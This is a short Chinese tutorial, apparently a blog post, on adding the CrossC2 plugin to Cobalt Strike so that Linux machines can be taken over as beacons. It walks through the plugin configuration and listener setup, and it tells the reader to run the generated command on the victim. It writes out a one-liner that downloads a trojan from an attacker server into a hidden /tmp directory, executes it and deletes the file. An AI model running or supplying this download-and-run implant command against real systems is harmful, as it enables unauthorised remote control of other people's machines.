1.下载CrossC2
cs默认是不支持上线linux主机的 , 但是可以通过安装CrossC2插件实现
因为一些原因,目前强制只支持HTTPS beacon。
下载地址 : https://github.com/gloxec/CrossC2/releases/tag/v3.0.2
然后解压zip压缩包 , 这里我放到cs安装目录的script目录下 , 推荐这个目录 , 这个目录就是放一些cs脚本的
2.安装插件
首先编辑cna文件
vim CrossC2-GithubBot-2021-11-02.cna
# 修改CrossC2.cna脚本中CC2_PATH, CC2_BIN
$CC2_PATH = "/xxx/xx/xx/"; # <-------- fix
$CC2_BIN = "genCrossC2.Linux";
复制cs服务端目录下的 .cobaltstrike.beacon_keys到与genCrossC2.Linu在一个目录下
cp .cobaltstrike.beacon_keys ./script
启动cs , 使用客户端加载cna插件
选择Script Manager,添加CrossC2.cna (如果成功安装,菜单栏会多出一项 CrossC2)
3.上线测试
3.1生成后门
新建一个https的监听
3.2生成上线命令
3.3上线
将上线命令复制到受害者上执行
上线成功
4.总结
整个流程 : 先生成一个后门linux平台的后门文件
然后再开启一个web服务 , 生成一系列命令
具体命令
mkdir /tmp/.xNbKN; rm -f /tmp/.xNbKN/update; curl -A O -L http://192.168.0.117:55413/xFhmSNydFZ -o /tmp/.xNbKN/update; chmod 755 /tmp/.xNbKN/update; /tmp/.xNbKN/update; sleep 10; rm -rf /tmp/.xNbKN/update
# 创建一个目录 , 然后删除update , 下载木马文件 , 保存成update , 给权限 , 然后执行 , 睡10秒 , 删除update
如果cs使用了profile文件 , 注意 是否符合CrossC2 如果不符合 , 则不能上线 , 目前我还没有测试